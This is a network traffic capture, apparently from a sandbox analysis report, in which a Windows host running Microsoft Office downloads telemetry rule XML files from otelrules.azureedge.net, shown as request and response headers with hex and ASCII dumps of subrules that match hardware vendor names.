2024-11-11 00:14:58 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:14:58 GMT Content-Type: text/xml Content-Length: 415 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT ETag: "0x8DC582BA41997E3" x-ms-request-id: 1c98c384-301e-0096-1749-32e71d000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001458Z-15869dbbcc6kg5mvhC1DFW39vn00000003s000000000fzys x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 00:14:58 UTC	415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru

Session ID	Source IP	Source Port	Destination IP	Destination Port
25	192.168.2.4	49780	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:14:58 UTC	192	OUT	GET /rules/rule120620v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:14:58 UTC	491	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:14:58 GMT Content-Type: text/xml Content-Length: 469 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT ETag: "0x8DC582BBA701121" x-ms-request-id: 5b0f577f-401e-0083-0132-33075c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001458Z-17df447cdb57srlrhC1DFWwgas00000009y00000000088wn x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-11 00:14:58 UTC	469	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
26	192.168.2.4	49782	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:14:58 UTC	192	OUT	GET /rules/rule120622v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:14:58 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:14:58 GMT Content-Type: text/xml Content-Length: 477 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT ETag: "0x8DC582BB8CEAC16" x-ms-request-id: a9551dca-101e-0034-25a3-3196ff000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001458Z-17df447cdb57g7m7hC1DFW791s00000009r0000000006nbk x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 00:14:58 UTC	477	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
27	192.168.2.4	49783	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:14:58 UTC	192	OUT	GET /rules/rule120623v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:14:58 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:14:58 GMT Content-Type: text/xml Content-Length: 464 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT ETag: "0x8DC582B97FB6C3C" x-ms-request-id: 9a7895f4-301e-006e-7862-32f018000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001458Z-15869dbbcc662ldwhC1DFWh4e000000003wg000000003t75 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 00:14:58 UTC	464	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor

Session ID	Source IP	Source Port	Destination IP	Destination Port
28	192.168.2.4	49784	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:14:58 UTC	192	OUT	GET /rules/rule120624v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:14:58 UTC	491	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:14:58 GMT Content-Type: text/xml Content-Length: 494 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT ETag: "0x8DC582BB7010D66" x-ms-request-id: 7f7db364-701e-005c-2f05-2dbb94000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001458Z-16547b76f7f2g4rlhC1DFWnx880000000d7000000000hx7s x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 00:14:58 UTC	494	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
29	192.168.2.4	49785	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:14:59 UTC	192	OUT	GET /rules/rule120625v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:14:59 UTC	491	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:14:59 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT ETag: "0x8DC582B9748630E" x-ms-request-id: 7f90071c-a01e-0070-5382-32573b000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001459Z-17df447cdb5c9wvxhC1DFWn08n0000000a0g000000004wbh x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-11 00:14:59 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
30	192.168.2.4	49786	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:14:59 UTC	192	OUT	GET /rules/rule120626v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:14:59 UTC	491	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:14:59 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT ETag: "0x8DC582B9DACDF62" x-ms-request-id: 764b7f95-c01e-00a1-1c00-2d7e4a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001459Z-16547b76f7fkcrm9hC1DFWxdag0000000de000000000dbdz x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 00:14:59 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
31	192.168.2.4	49787	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:14:59 UTC	192	OUT	GET /rules/rule120627v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:14:59 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:14:59 GMT Content-Type: text/xml Content-Length: 404 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT ETag: "0x8DC582B9E8EE0F3" x-ms-request-id: 317e81ca-d01e-0049-70bf-31e7dc000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001459Z-15869dbbcc6zbpm7hC1DFW75xg00000006p000000000bvcq x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 00:14:59 UTC	404	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S

Session ID	Source IP	Source Port	Destination IP	Destination Port
32	192.168.2.4	49788	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:14:59 UTC	192	OUT	GET /rules/rule120628v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:14:59 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:14:59 GMT Content-Type: text/xml Content-Length: 468 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT ETag: "0x8DC582B9C8E04C8" x-ms-request-id: a8afc4dd-a01e-0053-3962-328603000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001459Z-17df447cdb5jg4kthC1DFWux4n00000009m000000000g7q0 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 00:14:59 UTC	468	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
33	192.168.2.4	49789	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:14:59 UTC	192	OUT	GET /rules/rule120629v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:14:59 UTC	491	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:14:59 GMT Content-Type: text/xml Content-Length: 428 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT ETag: "0x8DC582BAC4F34CA" x-ms-request-id: 9f11ee7d-201e-0096-73f2-2cace6000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001459Z-16547b76f7fcrtpchC1DFW52e80000000dbg00000000gdem x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 00:14:59 UTC	428	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"

Session ID	Source IP	Source Port	Destination IP	Destination Port
34	192.168.2.4	49790	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:15:00 UTC	192	OUT	GET /rules/rule120630v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:15:00 UTC	491	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:00 GMT Content-Type: text/xml Content-Length: 499 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT ETag: "0x8DC582B98CEC9F6" x-ms-request-id: 8e718dad-301e-0051-6df1-2c38bb000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001500Z-16547b76f7fdtmzhhC1DFW6zhc000000026g00000000fxy2 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 00:15:00 UTC	499	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
35	192.168.2.4	49791	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:15:00 UTC	192	OUT	GET /rules/rule120631v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:15:00 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:00 GMT Content-Type: text/xml Content-Length: 415 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B988EBD12" x-ms-request-id: 930d6d29-201e-003c-0353-3230f9000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001500Z-15869dbbcc6bdtw9hC1DFW9m4s00000005dg00000000bq71 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 00:15:00 UTC	415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" 